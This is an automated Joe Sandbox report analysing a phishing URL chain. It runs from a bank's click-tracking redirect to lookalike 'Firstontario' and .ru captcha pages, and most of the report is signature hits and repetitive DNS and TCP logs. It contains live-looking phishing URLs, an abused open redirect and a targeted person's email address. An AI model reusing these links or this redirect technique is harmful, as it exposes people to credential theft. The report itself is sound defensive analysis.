Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://webhosting.icicidirect.com/TDSCERT/UserResponseClickLogs.jsp?ID=DMAIL_03-JUL-2023_457530_48792&type=GETINSTANTEMICARDNOW&url=https://Firstontario.athrikasih.com/cloudflare-antibot#Holly.hebert+firstontario.com

Overview

General Information

Sample URL:https://webhosting.icicidirect.com/TDSCERT/UserResponseClickLogs.jsp?ID=DMAIL_03-JUL-2023_457530_48792&type=GETINSTANTEMICARDNOW&url=https://Firstontario.athrikasih.com/cloudflare-antibot#Holly.hebert
Analysis ID:1526006

Detection

Score:23
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Phishing site detected (based on shot match)
Connects to several IPs in different countries
Detected non-DNS traffic on DNS port
Executes massive DNS lookups (> 100)
Found iframes
HTML body contains password input but no form action
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1972,i,2799304042676746572,4008595400502752359,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=10896 --field-trial-handle=1972,i,2799304042676746572,4008595400502752359,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://webhosting.icicidirect.com/TDSCERT/UserResponseClickLogs.jsp?ID=DMAIL_03-JUL-2023_457530_48792&type=GETINSTANTEMICARDNOW&url=https://Firstontario.athrikasih.com/cloudflare-antibot#Holly.hebert+firstontario.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://9wetjda.niavereinho.ru/QTnArt4/#DHolly.hebert@firstontario.comMatcher: Template: captcha matched
Source: https://9wetjda.niavereinho.ru/QTnArt4/#DHolly.hebert@firstontario.comMatcher: Template: captcha matched
Source: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signinHTTP Parser: Iframe src: https://gpt.mail.yahoo.net/sandbox?client=login&version=0.1&limited=0&headerBidder=1&haq=1&benji=1#config=%7B%22positions%22%3A%5B%7B%22adUnitPath%22%3A%22%2F22888152279%2Fus%2Fylogin%2Fmain%2Fdt%2Fus_ylogin_main_dt_full_screen%22%2C%22adLocation%22%3A%22full_screen%22%2C%22size%22%3A%5B%5B1440%2C1024%5D%2C%5B%22fluid%22%5D%5D%2C%22div%22%3A%22gpt-passback%22%7D%5D%2C%22pageUrl%22%3A%22https%3A%2F%2Flogin.yahoo.com%22%2C%22headerBidder%22%3Atrue%2C%22yahooPrebid%22%3Atrue%2C%22geoCountryCode%22%3A%22US%22%2C%22npa%22%3Afalse%2C%22limited%22%3Afalse%2C%22PPId%22%3A%22792d774a647a744e784532754b67514a50696b777863762e38776648584968614d6c7e41%22%2C%22targetingConfig%22%3A%7B%22lang%22%3A%22en-US%22%2C%22bucket%22%3A%22mbr-fido-upsell-desktop1-control%2Cmbr-whatsapp-nac%2Cmbr-whatsapp-aol-non-hc-control%2Cmbr-ar-cc%22%2C%22spaceId%22%3A%22794200018%22%2C%22adLocation%22%3A%22full_screen%22%2C%22age%22%3A%220%22%2C%22gender%22%3A%220%22%2C%22colo%22%3A%22ir2%22%2C%22lu%22%3A%220%22%2C%22site%22%3A%22login%22%2C%22device%22%3A%22desktop%22%2C%22region%22%3A%22us%22%2C%22pageOrigin%22%3A%22https%3A%2F%2Flogin.yahoo.com%22%2C%22AXId%22%3A%22y-wJdztNxE2uKgQJPikwxcv.8wfHXIhaMl~A%22%7D%2C%22headerBidderConfig%22%3A%7B%22host%22%3A%22login.yahoo.com%22%2C%22pblob%22%3A%22lu%3A0%7C%7C794200018%7C%7C%22%2C%22buckets%22%3A%5B%22mbr-fido-upsell-desktop1-control%22%2C%22mbr-whatsapp-nac%22%2C%22mbr-whatsapp-aol-non-hc-control%22%2C%22mbr-ar-cc%22%5D%2C%22limited%22%3Afalse%2C%22cobrand%22%3A%22%22%2C%22lang%22%3A%22en-US%22%2C%22site%22%3A%22yahoo_login%22%2C%22region%22%3A%22us%22%2C%22adLocation%22%3A%22full_screen%22%2C%22dv360%22%3A%22eS1HOE1rQmVGRTJ1Rm9nZ2xUMGNONHpVRi5sTE1kT3hvMn5B%22%2C%22AXId%22%3A%22y-wJdztNxE2uKgQJPikwxcv.8wfHXIhaMl~A%22%7D%7D
Source: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signinHTTP Parser: Iframe src: https://gpt.mail.yahoo.net/sandbox?client=login&version=0.1&limited=0&headerBidder=1&haq=1&benji=1#config=%7B%22positions%22%3A%5B%7B%22adUnitPath%22%3A%22%2F22888152279%2Fus%2Fylogin%2Fmain%2Fdt%2Fus_ylogin_main_dt_full_screen%22%2C%22adLocation%22%3A%22full_screen%22%2C%22size%22%3A%5B%5B1440%2C1024%5D%2C%5B%22fluid%22%5D%5D%2C%22div%22%3A%22gpt-passback%22%7D%5D%2C%22pageUrl%22%3A%22https%3A%2F%2Flogin.yahoo.com%22%2C%22headerBidder%22%3Atrue%2C%22yahooPrebid%22%3Atrue%2C%22geoCountryCode%22%3A%22US%22%2C%22npa%22%3Afalse%2C%22limited%22%3Afalse%2C%22PPId%22%3A%22792d774a647a744e784532754b67514a50696b777863762e38776648584968614d6c7e41%22%2C%22targetingConfig%22%3A%7B%22lang%22%3A%22en-US%22%2C%22bucket%22%3A%22mbr-fido-upsell-desktop1-control%2Cmbr-whatsapp-nac%2Cmbr-whatsapp-aol-non-hc-control%2Cmbr-ar-cc%22%2C%22spaceId%22%3A%22794200018%22%2C%22adLocation%22%3A%22full_screen%22%2C%22age%22%3A%220%22%2C%22gender%22%3A%220%22%2C%22colo%22%3A%22ir2%22%2C%22lu%22%3A%220%22%2C%22site%22%3A%22login%22%2C%22device%22%3A%22desktop%22%2C%22region%22%3A%22us%22%2C%22pageOrigin%22%3A%22https%3A%2F%2Flogin.yahoo.com%22%2C%22AXId%22%3A%22y-wJdztNxE2uKgQJPikwxcv.8wfHXIhaMl~A%22%7D%2C%22headerBidderConfig%22%3A%7B%22host%22%3A%22login.yahoo.com%22%2C%22pblob%22%3A%22lu%3A0%7C%7C794200018%7C%7C%22%2C%22buckets%22%3A%5B%22mbr-fido-upsell-desktop1-control%22%2C%22mbr-whatsapp-nac%22%2C%22mbr-whatsapp-aol-non-hc-control%22%2C%22mbr-ar-cc%22%5D%2C%22limited%22%3Afalse%2C%22cobrand%22%3A%22%22%2C%22lang%22%3A%22en-US%22%2C%22site%22%3A%22yahoo_login%22%2C%22region%22%3A%22us%22%2C%22adLocation%22%3A%22full_screen%22%2C%22dv360%22%3A%22eS1HOE1rQmVGRTJ1Rm9nZ2xUMGNONHpVRi5sTE1kT3hvMn5B%22%2C%22AXId%22%3A%22y-wJdztNxE2uKgQJPikwxcv.8wfHXIhaMl~A%22%7D%7D
Source: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signinHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://firstontario.athrikasih.com/cloudflare-antibot/#Holly.hebert+firstontario.comHTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20qtFLbZ%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...
Source: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signinHTTP Parser: <input type="password" .../> found
Source: https://firstontario.athrikasih.com/cloudflare-antibot/#Holly.hebert+firstontario.comHTTP Parser: No favicon
Source: https://9wetjda.niavereinho.ru/QTnArt4/#DHolly.hebert@firstontario.comHTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signinHTTP Parser: No favicon
Source: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signinHTTP Parser: No <meta name="author".. found
Source: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signinHTTP Parser: No <meta name="author".. found
Source: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signinHTTP Parser: No <meta name="copyright".. found
Source: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signinHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 46.228.174.117:443 -> 192.168.2.16:50549 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 12MB later: 28MB
Source: unknownNetwork traffic detected: IP country count 13
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49897 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50668 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50128 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:50724 -> 1.1.1.1:53
Source: global trafficDNS traffic detected: number of DNS queries: 195
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
